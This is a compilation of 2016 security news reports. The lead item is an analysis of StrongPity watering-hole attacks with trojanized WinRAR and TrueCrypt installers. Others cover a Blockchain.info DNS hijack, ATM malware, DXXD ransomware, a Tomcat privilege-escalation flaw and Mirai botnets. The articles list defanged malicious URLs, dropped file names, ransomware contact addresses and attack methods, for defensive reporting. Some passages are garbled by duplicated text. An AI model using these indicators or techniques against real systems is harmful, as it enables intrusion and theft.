This actor set up a particularly clever site to deliver trojanized WinRAR installers in the summer of 2016, appears to have compromised another, and this activity reminds us somewhat of the early 2014 Crouching Yeti activity. Much of the Crouching Yeti intrusions were enabled by trojanizing legitimate ICS-related IT software installers like SCADA environment vpn client installers and industrial camera software driver installers. Then, they would compromise the legitimate company software distribution sites and replace the legitimate installers with the Crouching Yeti trojanized versions. The tactics effectively compromised ICS and SCADA related facilities and networks around the world. Simply put, even when visiting a legitimate company distribution site, IT staff was downloading and installing ICS-focused malware. StrongPity’s efforts did much the same.
In the case of StrongPity, the attackers were not focused on ICS or SCADA. They set up a domain name (ralrab[.]com) mimicking the legitimate WinRAR distribution site (rarlab[.]com), and then placed links on a legitimate “certified distributor” site in Europe to redirect to their poisoned installers hosted on ralrab[.]com. In Belgium, the attackers placed a “recommended” link to their ralrab[.]com site in the middle of the localized WinRAR distribution page on winrar[.]be. The big blue recommended button (here in French) linked to the malicious installer, while all the other links on the page directed to legitimate software:
Winrar[.]be site with “recommended link” leading to malicious ralrab[.]com
The winrar[.]be site evaluated what “recommended” package a visitor may need based on browser localization and processor capability, and accordingly offered up appropriate trojanized versions. Installer resources named for french and dutch versions, along with 32-bit versus 64-bit compiled executables were provided over the summer:
hxxp://www.ralrab[.]com/rar/winrar-x64-531.exe
hxxp://www.ralrab[.]com/rar/winrar-x64-531fr.exe
hxxp://www.ralrab[.]com/rar/winrar-x64-531nl.exe
hxxp://www.ralrab[.]com/rar/wrar531.exe
hxxp://www.ralrab[.]com/rar/wrar531fr.exe
hxxp://www.ralrab[.]com/rar/wrar531nl.exe
hxxp://ralrab[.]com/rar/winrar-x64-531.exe
hxxp://ralrab[.]com/rar/winrar-x64-531nl.exe
hxxp://ralrab[.]com/rar/wrar531fr.exe
hxxp://ralrab[.]com/rar/wrar531nl.exe
hxxp://ralrab[.]com/rar/wrar53b5.exe
Directory listing, poisoned StrongPity installers, at rarlrab[.]com
The first available visitor redirects from winrar[.]be to ralrab[.]com first appeared on May 28th, 2016, from the dutch speaking version of the winrar.be site. And around the same time, another “certified distributor” winrar[.]it served trojanized installers as well. The major difference here is that we didn’t record redirections to ralrab[.]com, but it appears the site directly served StrongPity trojanized installers:
hxxps://www.winrar[.]it/prelievo/WinRAR-x64-531it.exe
hxxps://www.winrar[.]it/prelievo/WRar531it.exe
The site started serving these executables a couple of days earlier on 5/24, where a large majority of Italian visitors where affected.
Download page, winrar[.]it
Quite simply, the download links on this site directed visitors to trojanized WinRAR installers hosted from the winrar.it site itself. It’s interesting to note that both of the sites are “distributors”, where the sites are owned and managed not by rarlabs, but by local owners in individual countries.
StrongPity also directed specific visitors from popular, localized software sharing sites directly to their trojanized installers. This activity continued into late September 2016. In particular, the group redirected visitors from software aggregation and sharing site tamindir[.]com to their attacker-controlled site at true-crypt[.]com. The StrongPity controlled Truecrypt site is a complete rip of the legitimate site, now hosted by Sourceforge. Here is the Tamindir truecrypt page, looks harmless enough.
TrueCrypt page, tamindir software sharing site
Unlike the newer poisoned WinRAR installers, StrongPity hosted several Much like the poisoned WinRAR installers, multiple filenames have been used to keep up with visitor interests. Visitors may have been directed to
the site by other means and downloaded directly from the ripped and persuasive site.
true-crypt[.]com malicious StrongPity distribution site
At the very bottom of the page, there are a couple of links to the poisoned installers:
hxxp://www.true-crypt[.]com/download/TrueCrypt-Setup-7.1a.exe
hxxp://true-crypt[.]com/files/TrueCrypt-7.2.exe
Referrers include these localized software aggregates and sharers:
gezginler[.]net/indir/truecrypt.html
tamindir[.]com/truecrypt/indir
It’s interesting that Ksn recorded appearance of the the file on two unique systems in December 2015, a third in January 2016, all in Turkey, and then nothing until May 2016. Then, deployment of the installers
continued mostly within Turkey in July and September 2016.
Summer 2016 Watering Hole Victim Geolocations – WinRAR and TrueCrypt
Over the course of a little over a week, malware delivered from winrar.it appeared on over 600 systems throughout Europe and Northern Africa/Middle East. Likely, many more infections actually occurred.
Accordingly, the country with the overwhelming number of detections was in Italy followed by Belgium and Algeria. The top countries with StrongPity malware from the winrar.it site from May 25th through the first few days of June are Italy, Belgium, Algeria, Cote D’Ivoire, Morroco, France, and Tunisia.
winrar[.]it StrongPity component geolocation distribution
In a similar time-span, the over sixty visitors redirected from winrar.be to ralrab.com for malicious file download were overwhelmingly located in one country. The top countries directed to StrongPity malware from the winrar.be site from May 25th through the first few days of June are Belgium, Algeria, Morroco, Netherlands, Canada, Cote D’Ivoire, and Tunisia.
winrar[.]be StrongPity component geolocation distribution
StrongPity previously set up TrueCrypt themed watering holes in late 2015. But their offensive activity surged in late summer 2016. The group set up a site directly pulled from the contents of the legitimate TrueCrypt website. From mid July to early September, dozens of visitors were redirected from tamindir[.]com to true-crypt[.]com with unsurprisingly almost all of the focus on systems in Turkey, with victims in the Netherlands as well.
tamindir[.]com to true-crypt[.]com poisoned TrueCrypt installer redirects
StrongPity Malware
The StrongPity droppers were often signed with unusual digital certificates, dropping multiple components that not only provide complete control of the victim system, but effectively steal disk contents, and can download components for further collection of various communications and contacts. Because we are talking about StrongPity watering holes, let’s take a quick look at what is being delivered by the group from these sites.
When we count all systems from 2016 infected with any one of the StrongPity components or a dropper, we see a more expansive picture. This data includes over 1,000 systems infected with a StrongPity component. The top five countries include Italy, Turkey, Belgium, Algeria, and France.
In the case of the winrar[.]be/ralrab[.]com watering hole malware, each one of the six droppers that we observed created a similar set of dropped components on disk. And, in these cases, the attackers did not re-use their fake digital certificates. In addition to installing the legitimate version of WinRAR, the dropper installed the following StrongPity components:
%temp%\procexp.exe
%temp%\sega\
nvvscv.exe
prst.cab
prst.dll
wndplyr.exe
wrlck.cab
wrlck.dll
Of these files, two are configurable and encrypted with the same keyless cipher, “wrlck.cab” and “prst.cab”. While one maintains several callback c2 for the backdoor to fetch more instructions and upload installed software and file paths, the other maintains something a bit more unusual. “prst.cab” maintains an encrypted list of programs that maintain encrypted connections. This simple encoding takes the most significant nibble for each character, swaps the nibbles of that byte, and xors the result against the original value. Its code looks something like this:
x = s[i];
j = ((x & 0xF0)>>4);
y = x ^ j;
Using that cipher in the ralrab[.]com malware, the package is configured to seek out several crypto-enabled software applications, highlighting the group’s interest in users of more encryption-supported software suites.
putty.exe (a windows SSH client)
filezilla.exe (supports ftps uploads)
winscp.exe (a windows secure copy application, providing encrypted and secure file transfer)
mstsc.exe (Windows Remote Desktop client, providing an encrypted connection to remote systems)
mRemoteNG.exe (a remote connections manager supporting SSH, RDP, and other encrypted protocols)
Also included in StrongPity components are keyloggers and additional data stealers.
Conclusion
Widely available, strong cryptography software tools help provide secure and private communications that are now easily obtained and usable. In the summer of 2016, multiple encryption-enabled software applications were targeted with watering hole, social engineering tactics, and spyware by the StrongPity APT. While watering holes and poisoned installers are tactics that have been effectively used by other APT, we have never seen the same focus on cryptographic-enabled software. When visiting sites and downloading encryption-enabled software, it has become necessary to verify the validity of the distribution site and the integrity of the downloaded file itself. Download sites not using PGP or strong digital code signing certificates need to re-examine the necessity of doing so for their own customers. We have seen other APT such as Crouching Yeti and Darkhotel distribute poisoned installers and poisoned executable code, then redistribute them through similar tactics and over p2p networks. Hopefully, simpler verification systems than the current batch of PGP and SSL applications will arise to be adopted in larger numbers. Until then, strong anti-malware and dynamic whitelisting solutions will be more necessary than ever.
BlockChain.info Domain Hijacked; Site Goes Down; 8 Million Bitcoin Wallets Inaccessible
13.10.2016 thehackernews Hacking
UPDATE: The site is back and working. Blockchain team released a statement via Twitter, which has been added at the end of this article.
If you are fascinated with the idea of digital currency, then you might have heard about BlockChain.Info.
It’s Down!
Yes, Blockchain.info, the world's most popular Bitcoin wallet and Block Explorer service, has been down from last few hours, and it's believed that a possible cyber attack has disrupted the site.
The site is down at the time of writing, and the web server reports a bad gateway error, with a message on the website that reads:
"Looks like our site is down. We're working on it and should be back up soon."
With more than 8 million Digital Wallet customers, BlockChain is users' favorite destination to see recent transactions, stats on mined blocks and bitcoin economy charts.
blockchain-bitcoin-website
A few hours ago, BlockChain team tweeted about the sudden breakdown of the site, saying: "We're researching a DNS issue and looking into it. We apologize for the inconvenience. Stay tuned."
"We're making progress resolving the issue, but it may take upwards of several hours until services are fully restored," another tweet reads.
However, a Reddit user has noted that "The whois and DNS records suddenly jumped from CloudFlare to a cheap web host."
It seems that their domain name has been hijacked, which was later confirmed by the BlockChain team on Reddit, saying:
"Hey everyone, our DNS provider was targeted. It's going to be several hours before our services are fully restored. The CloudFlare DNS is propagating now."
Until resolved, which may take next few hours, Blockchain.info digital wallet users would not be able to access their online accounts. In response to this incident, Blockchain users are in hopes that their online wallet has not been hacked or funds stolen.
Since its DNS server has been hijacked, it could be possible that an attacker can host a fake web page on the same domain in an effort to steal your bitcoin wallet credentials.
So, Blockchain users are strongly recommended not to log in to the site until the Blockchain team releases an official statement via its Twitter account.
Official Statement From BlockChain:
"Earlier today, we discovered our DNS registrar had been compromised. We took immediate action to resolve the issue. To be abundantly cautious, we’re waiting for the DNS to propagate universally across the web before bringing our services back. Once DNS has propagated, we expect to restore services ASAP. Our sincerest apologies for any inconvenience."
However, there is no statement from the Blockchain.info team that suggests any hacking or compromise of its users bitcoin wallets.
Hackeři si nakradli milióny. Nakonec ale udělali hloupou chybu
13.10.2016 Novinky/Bezpečnost Kriminalita
Stačilo poslat SMS zprávu a bankomat vydal hackerům peníze. I když to může znít jako sci-fi, před dvěma roky hackeři opravdu přišli na způsob, jak toho docílit. Vše nejprve vypadalo, že jsou tak chytří, že se je nepodaří ani dopadnout. Nakonec ale udělali hloupou chybu a hned několik jich bylo dopadeno.
Skupina hackerů se v uplynulých dvou letech soustředila na bankomaty ve Velké Británii. Útočili především v Londýně a od roku 2014 zvládli ukrást více než 1,5 miliónu liber, tedy bezmála 45 miliónů korun.
Za útoky má být společně s dalšími kumpány zodpovědný třicetiletý rumunský hacker Emanual Leahu. Právě toho už na konci září dopadla anglická policie, informovala o tom až na konci minulého týdne.
Zapomněli na kamery
Sluší se podotknout, že ještě předtím skončila želízka také na rukách dalších dvou hackerů, kteří do kyberzločineckého gangu patřili. Pikantní na tom je, že dopadnout se je podařilo jen díky tomu, že se hned v několika případech zapomněli zahalit před kamerou bankomatu. Školácká chyba se jim stala osudnou.
V celách skončili již tři hackeři z pětičlenného týmu. Zbývající dva se podle informací policie ukrývají někde v Rumunsku.
Na celé kauze je velmi zajímavý i způsob, jakým kyberzločinci útočili. Ti přišli na to, že uvnitř na první pohled nedobytné konstrukce se ukrývá obyčejný počítač, který tehdy ještě pracoval pod operačním systémem Windows XP.
A právě ten byl pověstnou Achillovou patou celého systému – byl totiž stejně zranitelný jako běžné počítače. Hackeři tak připojili k USB portu uvnitř bankomatu mobilní telefon, prostřednictvím kterého se do operačního systému dostal záškodník – virus Ploutus.
Stačilo poslat SMS zprávu
Pro získání peněz pak stačilo odeslat na připojený mobil speciálně upravenou SMS zprávu, která byla následně předána systému. Ten pak bez jakýchkoliv námitek vydal požadovanou částku. Celý útok tak trval sotva pár sekund.
Získat přístup do útrob bankomatu přitom podle bezpečnostních expertů antivirové společnosti Symantec nebylo nijak složité. Zatímco spodní část, která uchovává bankovky, byla před dvěma lety důmyslně zabezpečena, horní díl s počítačem ochraňoval pouze jeden menší zámek.
Researchers Demonstrated How NSA Broke Trillions of Encrypted Connections
12.10.2016 thehackernews BigBrothers
In the year 2014, we came to know about the NSA's ability to break Trillions of encrypted connections by exploiting common implementations of the Diffie-Hellman key exchange algorithm – thanks to classified documents leaked by ex-NSA employee Edward Snowden.
At that time, computer scientists and senior cryptographers had presented the most plausible theory: Only a few prime numbers were commonly used by 92 percent of the top 1 Million Alexa HTTPS domains that might have fit well within the NSA's $11 Billion-per-year budget dedicated to "groundbreaking cryptanalytic capabilities."
And now, researchers from University of Pennsylvania, INRIA, CNRS and Université de Lorraine have practically proved how the NSA broke the most widespread encryption used on the Internet.
Diffie-Hellman key exchange (DHE) algorithm is a standard means of exchanging cryptographic keys over untrusted channels, which allows protocols such as HTTPS, SSH, VPN, SMTPS and IPsec to negotiate a secret key and create a secure connection.
Since applications that rely on the Diffie-Hellman key exchange algorithm generates ephemeral keys using groups of large prime numbers, it would take hundreds or thousands of years and a nearly unimaginable amount of money to decrypt secure communications directly.
However, it took researchers just two months and as many as 3,000 CPUs to break one of the 1,024-bit keys that are used to secure communications on the Internet today, which could have allowed them to passively decrypt hundreds of millions of HTTPS-based communications and other Transport Layer Security (TLS) channels.
Encrypted communications could have an undetectable backdoor
You might be wondering how the researchers managed to do something which practically takes hundreds of years, with the computational hardware available today.
In a research paper [PDF] published Tuesday, the researchers explained that the Diffie-Hellman algorithm does not contain any backdoor itself, but it has been intentionally weakened in an undetectable way by hiding the fact how various applications generate prime numbers.
Additionally, the size of keys (i.e. less than or equals to 1024-bit) chosen to be used in the Diffie-Hellman algorithm also matters a lot.
The researchers created a weak 1024-bit Diffie-Hellman trapdoor function, i.e. randomly selecting large prime number but from a predefined group, and showed that solving the discrete logarithm problem that underpins its security is about 10,000 times easier.
"Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers wrote in their paper.
So, advanced hackers or well-resourced agencies who are aware of the fact how prime numbers are being generated for trapdoor function and looking to decrypt 1024-bit secured communications can unscramble the discrete logarithm in order to decrypt hundreds of millions of Diffie-Hellman-protected communications.
"The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible," the researchers said.
Researchers also estimate that conducting similar computations for 2048-bit keys, even with backdoored prime numbers, would be 16 Million times harder in comparison to 1024-bit keys and will remain infeasible for many upcoming years.
Despite the U.S. National Institute of Standards and Technology (NIST) recommending a transition to key sizes of at least 2,048 bits since 2010, the 1024-bit keys are still widely used online.
According to a survey performed by the SSL Pulse project, 22% of the Internet's top 140,000 HTTPS-protected sites use 1024-bit keys as of last month, which can be broken by nation-sponsored adversaries or intelligence agencies like NSA.
Therefore, the immediate solution to this issue is to switch to 2048-bit or even 4,096-bit keys, but, according to the researchers, in the future, all standardized prime numbers should be published together with their seeds.
The concept of backdooring primes used in the Diffie-Hellman key exchange algorithm is almost similar to the one discovered in the Dual Elliptic Curve Deterministic Random Bit Generator, better known as Dual_EC_DRBG, which is also believed to have been introduced by the NSA.
Almost three years ago, Snowden leaks revealed that RSA received $10 Million bribe from the NSA to implement their flawed cryptographic algorithm Dual_EC_DRBG in its bSafe Security tool as a default protocol in its products to keep encryption weak.
So, it is not at all surprising if the NSA would be using these undetectable and weakened "trapdoors" in millions of cryptographic keys to decrypt encrypted traffic over the Internet.
Facebook, Twitter and Instagram Share Data with Location-based Social Media Surveillance Startup
12.10.2016 thehackernews Social
location-social-media-monitoring-tool
Facebook, Instagram, Twitter, VK, Google's Picasa and Youtube were handing over user data access to a Chicago-based Startup — the developer of a social media monitoring tool — which then sold this data to law enforcement agencies for surveillance purposes, the ACLU disclosed Tuesday.
Government records obtained by the American Civil Liberties Union (ACLU) revealed that the big technology corporations gave "special access" to Geofeedia.
Geofeedia is a controversial social media monitoring tool that pulls social media feeds via APIs and other means of access and then makes it searchable and accessible to its clients, who can search by location or keyword to quickly find recently posted and publicly available contents.
The company has marketed its services to 500 law enforcement and public safety agencies as a tool to track racial protests in Ferguson, Missouri, involving the 2014 police shooting death of Mike Brown.
With the help of a public records request, the civil rights group found that Geofeedia had entered into agreements with Twitter, Facebook, and Instagram for their users' data, gaining a developer-level access to all three social networks that allowed them to review streams of user content in ways that regular users of the public cannot.
The Denver Police Department recently signed a $30,000 annual deal with Geofeedia.
Here's what the major tech giants offered Geofeedia:
Facebook allowed the company to use its "Topic Feed API" that let Geofeedia obtain a "ranked feed of public posts" centered around specific hashtags, places or events.
Instagram provided Geofeedia access to its API (Application Programming Interface) that is a feed of data from users' public Instagram posts, including their location.
Twitter provided Geofeedia with "searchable access" to its database of public tweets. However, Twitter added additional contract terms in February to try to safeguard further against surveillance, and when found Geofeedia still touting its product as a tool to monitor protests, Twitter sent Geofeedia a cease and desist letter.
Facebook, Instagram, and Twitter have all moved to restrict access to Geofeedia after learning about the tool's activities when presented with the study's findings.
The ACLU is concerned that Geofeedia can "disproportionately impact communities of color" by monitoring activists and their neighborhoods.
Nicole Ozer, technology, and civil liberties policy director for the ACLU of California said: "These special data deals were allowing the police to sneak in through a side door and use these powerful platforms to track protesters."
However, in response to the ACLU report, Geofeedia posted Tuesday an article justifying its commitment to Freedom of Speech and Civil Liberties, releasing the following statement:
"Geofeedia has in place clear policies and guidelines to prevent the inappropriate use of our software; these include protections related to free speech and ensuring that end-users do not seek to inappropriately identify individuals based on race, ethnicity, religious, sexual orientation or political beliefs, among other factors."
Facebook said in a statement that Geofeedia only had access to publically available data, while Twitter said it was suspending access shortly.
The ACLU is encouraging social media companies to adopt clear, public, and transparent policies prohibiting developers from exploiting user data for surveillance purposes.
DXXD Ransomware, displays legal notice and encrypts files on unmapped network shares
12.10.2016 securityaffairs Virus
The DXXD ransomware specifically targets servers and is able to encrypt files on network shares even if they haven’t been mapped.
Malware continues to evolve, the last threat in order of time that implemented a singular feature is the DXXD ransomware. The peculiarities of this threat is that it encrypts also file on network shares, even if they are, unmapped ( a feature already implemented by the Locky ransomware) and displays a legal notice.
The DXXD ransomware appends the. dxxd extension to the encrypted files, then it leaves a ransom note onto the infected machine. The DXXD ransom note contains instructions for the victims that need to contact rep_stosd@protonmail.com or rep_stosd@tuta.io.to the encrypted files, then it leaves a ransom note onto the infected machine. The DXXD ransom note contains instructions for the victims that need to contact rep_stosd@protonmail.com or rep_stosd@tuta.io.
Another interesting feature of the malware is its ability to configure a Windows Registry setting in order to display a sort of “legal notice” when people log into a computer. The VXers used this feature to allow a user who tries to login to the server to see the ransom note.
The DXXD ransomware changes the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption registry key and the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText to display the following note.
“When you start Windows, Windows Defender works to help protect your PC by scanning for malicious or unwanted software.”
It is still unclear the infection vector, Abrams speculate the threat is spread by abusing Remote Desktop Services.
“Based on information discovered, I believe that the ransomware developer is hacking into servers using Remote Desktop Services and brute forcing passwords. If you have been affected by the DXXD Ransomware, you should reset all the passwords for the affected machine.” wrote Lawrence Abrams.
According to Abrams, the author of the DXXD ransomware decided to taunt victims and experts who help victims by creating an account on BleepingComputer and claiming that a newer version of the threat it is more difficult to decrypt. The developer also claimed to have exploited a zero-day vulnerability to compromise servers and deliver the malware.
As usual, let me discourage from paying the ransomware because there is no guarantee that you will receive back your files. Don’t forget to back up your data frequently and use anti-malware solutions. In the specific case, it could be better to disable Remote Desktop Protocol (RDP) and files running from AppData/LocalAppData folders.
Malware pro Macy může získat přístup k webkameře i mikrofonu. Obranou je drobná utilita i černá páska
12.10.2016 Živě Viry
Na konferenci Virus Bulletin v Denveru prezentoval specialista na bezpečnost a bývalý zaměstnanec NSA Patrick Wardle zranitelnost systému macOS, která umožňuje potenciálním útočníkům získat přístup k datům z webkamery a mikrofonu Macbooku.
Na úrovni firmwaru je provoz kamery signalizován rozsvícením zelené LED diody a její případné odstavení by tedy bylo velmi složité, případně nemožné. Útočníci se však mohou zaměřit na okamžiky, kdy je webkamera a mikrofon využíván při hovoru na Skypu nebo Facetimu. Uživatel nedostane žádnou informaci o tom, že webkameru využívá kromě komunikátoru ještě další software.
Případný malware, který by měl za úkol získání záznamu, by tedy k zachycení využil stream určený pro legitimní komunikátory a následně jej odesílal na servery útočníka. Wardle proto připravil v rámci své prezentace jednoduchou utilitu, která sleduje aplikace s přístupem k datům z webkamery a případné neautorizované pokusy o získání záznamu blokuje a oznamuje systémovou notifikací.
Aplikace OverSight monitoruje aplikace, které mají přístup k záznamovým zařízením a případně upozorňuje na nové přístupy
Ještě o něco účinnější metodou potom bude způsob, který zvolil Mark Zuckerberg, tedy černou izolační pásku. Toto opatření neobejde sebelepší hacker.
ACSC Report – Australian Bureau of Meteorology hacked by foreign spies
12.10.2016 securityaffairs Hacking
A report published by the Australian Cyber Security Centre confirmed the Australian Bureau of Meteorology hack was powered by foreign cyber spies.
In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by Australialian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.
The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defence agencies, its disclosure could give a significant advantage to a persistent attacker for numerous reasons.
Initial media reports blamed China for the cyber attack, in 2013 Chinese hackers were accused by authorities of stealing the top-secret documents and projects of Australia’s new intelligence agency headquarters.
“China is being blamed for a major cyber attack on the computers at the Bureau of Meteorology, which has compromised sensitive systems across the Federal Government.” states the ABC. “The bureau owns one of Australia’s largest supercomputers and provides critical information to a host of agencies. Its systems straddle the nation, including one link into the Department of Defence at Russell Offices in Canberra.”
The systems at the Bureau of Meteorology elaborate a huge quantity of information and weather data that are provided to various industries, including the military one.
The consequence of a cyber attack on such kind of systems could represent a menace to the homeland security.
Now new information was disclosed by the government’s Australian Cyber Security Centre that Wednesday published a report on the incident. The experts at Australian Cyber Security Centre attributed “the primary compromise to a foreign intelligence service,” they did not provide any information of the culprit.
“We don’t narrow it down to specific countries, and we do that deliberately,” said the minister for cybersecurity, Dan Tehan. “But what we have indicated is that cyber espionage is alive and well,” he told ABC News 24. “We have to make sure that we’re taking all the steps necessary to keep us safe, because the threat is there. The threat is real. Cybersecurity is something that we, as a nation, have to take very seriously.”
The report confirms the presence of a malware in the system of the Australian Bureau of Meteorology. The national cyber security agency, Australian Signals Directorate (ASD), detected a Remote Access Tool (RAT) malware “popular with state-sponsored cyber adversaries,” and confirmed that the same malicious code was used to compromise other Australian government networks in the past.
“ASD identified evidence of the adversary searching for and copying an unknown quantity of documents from the Bureau’s network. This information is likely to have been stolen by the adversary.” reads the report.
Another interesting aspect of the report is the opinion of the experts of the terrorist cyber threat, they explained that cyber capabilities of terrorists remain rudimentary.
“Apart from demonstrating a savvy understanding of social media and exploiting the internet for propaganda purposes, terrorist cyber capabilities generally remain rudimentary and show few signs of improving significantly in the near future,” states the report.
StrongPity APT – Waterhole attacks against Italian and Belgian users
12.10.2016 securityaffairs APT
Kaspersky published a report on cyber espionage activities conducted by StrongPity APT that most targeted Italians and Belgians with watering holes attacks.
Experts from Kaspersky Lab have published a detailed report on the cyber espionage activities conducted by the StrongPity APT. The group is very sophisticated, its operations leverage on watering holes attacks and malware to target users of software designed for encrypting data and communications.
The StrongPity APT targeted users Europe, the Middle East, and Northern Africa.
StrongPity set up the website ralrab.com aiming to mimic the legitimate rarlab.com website, the website was used as a landing domain to deliver poisoned installers of popular software. The group used to compromise the sites of certified distributors from Europe in an effort to redirect users to ralrab.com that was hosting the trojanized version of the legitimate application.
StrongPity group set up a rogue TrueCrypt website hosted at true-crypt.com, it was used to redirect users from software downloads website Tamindir. Kaspersky reported that StrongPity started setting up TrueCrypt-themed watering hole attacks in late 2015, but the experts of the company noticed a peak in the number of attacks this summer. The majority of the users that were victims of this attack were located in Turkey and some in the Netherlands.
Italian visitors of the legitimate distributor website winrar.it were redirected to trojanized WinRAR installers hosted from the winrar.it website itself.
“Over the course of a little over a week, malware delivered from winrar.it appeared on over 600 systems throughout Europe and Northern Africa/Middle East. Likely, many more infections actually occurred. Accordingly, the country with the overwhelming number of detections was in Italy followed by Belgium and Algeria. The top countries with StrongPity malware from the winrar.it site from May 25th through the first few days of June are Italy, Belgium, Algeria, Cote D’Ivoire, Morroco, France, and Tunisia.” states the report.
winrar it StrongPity component geolocation distribution
winrar[.]it StrongPity component geolocation distribution
In the arsenal of the StrongPity APT there are multiple components that allow attackers to gain complete control of the target system and effectively exfiltrate data from the machine. According to Kaspersky, the droppers used by the group were often signed with unusual digital certificates.
“Because we are talking about StrongPity watering holes, let’s take a quick look at what is being delivered by the group from these sites.” continues the report reporting more than systems infected with a StrongPity malware.
“When we count all systems from 2016 infected with any one of the StrongPity components or a dropper, we see a more expansive picture. This data includes over 1,000 systems infected with a StrongPity component. The top five countries include Italy, Turkey, Belgium, Algeria, and France.”
The group used a component that looks for encryption-supported software suites, including the SSH and telnet client Putty, the FTP tool FileZilla, remote connections manager mRemoteNG, Microsoft’s Mstsc remote desktop client, and the SFTP and FTP client WinSCP.
“When visiting sites and downloading encryption-enabled software, it has become necessary to verify the validity of the distribution site and the integrity of the downloaded file itself. Download sites not using PGP or strong digital code signing certificates need to re-examine the necessity of doing so for their own customers,” states the report.
According to Kurt Baumgartner, principal security researcher at Kaspersky Lab, the TTPs observed for the StrongPity APT are similar to the ones of another Russian threat actor known as Energetic Bear/ Crouching Yeti /Dragonfly).
In 2014, Kaspersky published an interesting analysis on the Crouching Yeti group that used a large network of hacked websites (219 domains) as command and control infrastructure. The vast majority of these websites were legitimate and were used to serve malware and instruct bot agents worldwide to collect information on target systems. Most of the 2,800 companies identified as victims of the attack were in the industrial/machinery market and hacker most-targeted countries like the United States, Spain, Japan, and Germany.
”They ran vulnerable content management systems or vulnerable web applications. None of the exploits used to compromise the servers were known to be zero-day. None of the client side exploits re-used from the open source metasploit framework were zero-day.” reports the report published by Kaspersky Lab.
The attackers used the following attack scheme to infect victims:
Spearphishing using PDF documents embedded with a flash exploit (CVE-2011-0611)
Trojanized software installers
Waterhole attacks using a variety of re-used exploits
Hurry up,fix the CVE-2016-5425 privilege escalation flaw in Apache Tomcat
12.10.2016 securityaffairs Vulnerebility
The security research Dawid Golunski reported a Root Privilege Escalation in the Apache Tomcat (RedHat-based distros) tracked as CVE-2016-5425.
Apache Tomcat packages provided by default repositories of RedHat-based distributions (i.e. CentOS, RedHat, OracleLinux, Fedora, etc.) create a tmpfiles.d configuration file with insecure permissions. The configuration file /usr/lib/tmpfiles.d/tomcat.conf could be modified by a member of the tomcat group or by a malicious web application deployed on Tomcat in order to trigger the issue and escalate their privileges to root and compromise the system.
Depending on the specific machine. the execution of systemd-tmpfiles could be triggered by other services, including cronjobs and startup scripts.
The impact of the flaw is serious considering that the Apache Tomcat powers numerous large-scale web services in any industry.
“The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage temporary files including their creation. Attackers could very easily exploit the weak permissions on tomcat.conf to inject configuration that creates a rootshell or remote reverse shell that allows them to execute arbitrary commands with root privileges.” wrote Golunski in a security advisory.
“Injected malicious settings would be processed whenever /usr/bin/systemd–tmpfiles gets executed. systemd–tmpfiles is executed by default on boot on RedHat-based systems through systemd–tmpfiles-setup.service service as can be seen below:”
CVE-2016-5425 apache-tomcat
The flaw could potentially be exploited by remote attackers in combination with a vulnerable web application hosted on Apache Tomcat if they managed to find a path traversal (i.e. in a file upload feature) or an arbitrary file write/append vulnerability. This would allow them to append settings to /
This attacker just need to append settings to /usr/lib/tmpfiles.d/tomcat.conf file and achieve code execution with root privileges.This vector could prove useful to attackers, for
“This vector could prove useful to attackers, for example if they were unable to obtain a tomcat-privileged shell/codeexec by uploading a .jsp webshell through a vulnerable file upload feature due to restrictions imposed by Tomcat security manager, or a read-only webroot etc. It is worth to note that systemd–tmpfiles does not stop on syntax errors when processing configuration files which makes exploitation easier as attackers only need to inject their payload after a new line and do not need to worry about garbage data potentially prepended by a vulnerable webapp in case of Arbitrary File Write/Append exploitation.” added Golunski .
Further information on the affected systems was available in the security advisory published by RedHat.
To address the CVE-2016-5425 flaw update to the latest packages provided by your distribution or as workaround adjust permissions on /usr/lib/tmpfiles.d/tomcat.conf file removing write permission for the tomcat group.
Dawid Golunski also included a proof of concept code in his advisory.
Inside the DDoS attacks powered by large IoT botnets
12.10.2016 securityaffairs BotNet
Cloudflare firm has published a report that analyzes two recent attacks that were powered by large IoT botnets based on the Mirai Threat.
The IoT botnets represent one the most dangerous threats in the security landscape, recently we have assisted to cyber attacks powered by these infrastructures that reached magnitude never seen before.
The recent DDoS attacks powered by IoT botnets hit target websites with HTTP traffic, in some cases reaching more than one million requests per second. These IoT botnets leveraged on the Mirai malware specifically designed to scan the Internet for vulnerable IoT devices.
Cloudflare firm has published a report that analyzes two recent attacks that represent a sort of milestone in the DDoS attacks because the attackers switched from SYN flood- and ACK flood-based attacks at Layer 3, to HTTP-based attacks at Layer 7.
The company observed the DDoS attacks through their automatic DDoS mitigation systems examining specific features of the attacks such as the number of HTTP requests per second.
Cloudflare confirmed that two attacks peaked at more than 1 million HTTP requests per second. In one case the DDoS attack involved more than 52,000 IP addresses peaking at 1.75 million requests per second.
“This attack continued for 15 minutes. Multiple recent attacks had >1 Mrps and lasted for minutes.” states the report published by Cloudflare.
“This particular attack peaked at 1.75 Mrps. It was composed of short HTTP requests (around 121 bytes per request), without anything unusual in the HTTP headers. The requests had a fixed
Cookie
header. We counted 52,467 unique IP addresses taking part in this attack.”
According to Cloudflare the attack was powered through hundreds of autonomous systems networks, the biggest sources in the Ukraine (AS15895) and Vietnam (AS45899).
Cloudflare reported also data related to a second attack that peaked at 360 Gbps and leveraged on longer HTTP requests.
The attack lasted roughly one hour and was launched from 128,833 unique IP addresses, most of the attack concentrated on Frankfurt.
“It’s the long payload sent after the request headers that allowed the attackers to generate substantial traffic. Since this attack we’ve seen similar events with varying parameters in the request body,” states Cloudflare.“Sometimes these attacks came as GET requests, sometimes as POST. Additionally, this particular attack lasted roughly one hour, with 128,833 unique IP addresses.”
The analysis of the IoT devices involved in both attacks revealed that they have port 23 (telnet) open (closing connection immediately) or closed. Never filtered.
The vast majority of the IoT devices from the Vietnamese networks are connected CCTV cameras, most of them having open port 80 with presenting “NETSurveillance WEB” page.
What will happen in the future?
IoT devices will continue to be exploited by threat actors in the wild, “as more and more devices (fridges, fitness trackers, sleep monitors, …) are added to the Internet they’ll likely be unwilling participants in future attacks.”
